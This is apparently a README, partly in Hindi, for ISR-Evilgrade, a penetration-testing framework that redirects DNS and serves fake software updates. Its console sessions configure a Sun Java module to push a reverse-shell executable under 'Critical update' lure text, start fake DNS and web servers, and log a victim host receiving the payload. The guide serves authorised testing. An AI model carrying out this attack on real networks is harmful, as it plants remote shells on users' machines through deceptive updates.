
Evilgrade एक मॉड्यूलर फ्रेमवर्क है जो उपयोगकर्ता को खराब अपग्रेड कार्यान्वयन का लाभ उठाने की अनुमति देता है, नकली अपडेट इंजेक्ट करके।
Faraday Security Research -- | ISR-evilgrade | www.faradaysec.com | --
Evilgrade एक मॉड्यूलर फ्रेमवर्क है जो उपयोगकर्ता को नकली अपडेट इंजेक्ट करके खराब अपग्रेड कार्यान्वयन का लाभ उठाने की अनुमति देता है। यह पहले से तैयार बाइनरी (एजेंट), तेज पेंटेस्ट के लिए एक काम करने वाला डिफ़ॉल्ट कॉन्फ़िगरेशन, और अपने स्वयं के WebServer और DNSServer मॉड्यूल के साथ आता है। नई सेटिंग्स स्थापित करना आसान है, और जब नए बाइनरी एजेंट सेट किए जाते हैं तो इसका एक ऑटोकॉन्फ़िगरेशन होता है।
यह फ्रेमवर्क तब काम आता है जब हमलावर होस्टनाम रीडायरेक्शन (पीड़ित के DNS ट्रैफ़िक में हेरफेर) करने में सक्षम होता है, और ऐसा 2 परिदृश्यों में किया जा सकता है:
Evilgrade मॉड्यूल के साथ काम करता है, प्रत्येक मॉड्यूल में एक कार्यान्वित संरचना होती है जो किसी विशिष्ट एप्लिकेशन/सिस्टम के लिए नकली अपडेट का अनुकरण करने के लिए आवश्यक होती है।
ISR-Evilgrade क्रॉस-प्लेटफॉर्म है, यह केवल शोषण के लिए सही लक्ष्य प्लेटफॉर्म के लिए उपयुक्त पेलोड होने पर निर्भर करता है।
यह एक IOS कंसोल के समान काम करता है``` evilgrade>help Type 'help command' for more detailed help on a command. Commands: configure - Configure - no help available exit - exits the program help - prints this screen, or help on 'command' reload - Reload to update all the modules - no help available restart - Restart webserver - no help available set - Configure variables - no help available show - Display information of . start - Start webserver - no help available status - Get webserver status - no help available stop - Stop webserver - no help available version - Display framework version. - no help available
Object: options - Show options of current module. vhosts - Show VirtualHosts of current module. modules - List all modules available for use. active - Show active modules.
## कार्यान्वित मॉड्यूल की सूची``` console
evilgrade>show modules
List of modules:
===============
...
...
...
- 63 modules available.
evilgrade>conf sunjava evilgrade(sunjava)>
#### सभी VirtualHosts दिखाएँ।
#### VirtualHost फ़ील्ड में वे डोमेन हैं जिन्हें हमारा वेबसर्वर हमारे लिए अनुकरण करने वाला है।``` console
evilgrade>show vhosts
Virtual hosts:
=============
[
"java.sun.com",
"javadl-esd.sun.com",
...
...
...
]
evilgrade(sunjava)>show options
Name = Sun Microsystems Java Version = 2.0 Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] Description = "" VirtualHost = "java.sun.com|javadl-esd.sun.com"
.-------------------------------------------------------------------------------------------------------------------------. | Name | Default | Description | +--------------+-------------------------------------------------+--------------------------------------------------------+ | website | http://java.com/moreinfolink | Website displayed in the update | | enable | 1 | Status | | atitle | Critical vulnerability | Title name to be displayed in the systray item popup | | arg | | Arg passed to Agent | | adescription | This critical update fix internal vulnerability | Description to be displayed in the systray item popup | | description | This critical update fix internal vulnerability | Description to be displayed during the update | | agent | ./agent/reverseshellsign.exe | Agent to inject | | title | Critical update | Title name displayed in the update | '--------------+-------------------------------------------------+--------------------------------------------------------'
#### सेवाएँ प्रारंभ करें (DNS Server and WebServer)``` console
evilgrade>start
evilgrade>
[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...
#### Waiting for victims
evilgrade>
[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"
evilgrade>
[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"
evilgrade>
[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"
evilgrade>
[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"
evilgrade>show status Webserver (pid 4134) already running
.---------------------------------------------------------------------------------------------------------------. | Client | Module | Status | Md5,Cmd,File | +----------------+------------------+--------+------------------------------------------------------------------+ | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" | '----------------+------------------+--------+------------------------------------------------------------------'
## .:: [गहन उपयोग] ::.
### कमांड
#### configure / conf - <module-name> कॉन्फ़िगर करें
उदाहरण:
-------``` console
evilgrade>configure sunjava
evilgrade(sunjava)>
evilgrade>conf sunjava
evilgrade(sunjava)>
## 'conf' takes us back to the global configuration
evilgrade(sunjava)>conf
evilgrade>